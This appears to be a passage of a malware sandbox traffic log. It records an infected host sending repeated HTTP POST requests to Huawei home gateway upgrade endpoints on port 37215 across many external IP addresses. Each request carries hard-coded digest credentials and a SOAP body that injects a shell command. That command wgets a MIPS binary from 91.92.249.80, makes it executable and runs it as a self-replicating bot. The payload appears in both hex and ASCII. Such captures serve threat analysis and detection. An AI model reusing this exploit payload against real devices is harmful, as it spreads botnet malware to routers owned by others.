                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1140192.168.2.2339520197.219.208.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299690962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1141192.168.2.2337472197.41.191.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299709082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1142192.168.2.235702813.43.21.16637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299721003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1143192.168.2.2359518197.26.222.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299736023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1144192.168.2.235935841.198.178.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299740076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1145192.168.2.2358188197.112.200.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299753904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1146192.168.2.234707432.240.63.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299988985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1147192.168.2.234496680.142.132.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299990892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1148192.168.2.234943868.171.104.6037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300004959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1149192.168.2.2345524157.6.138.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300009966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
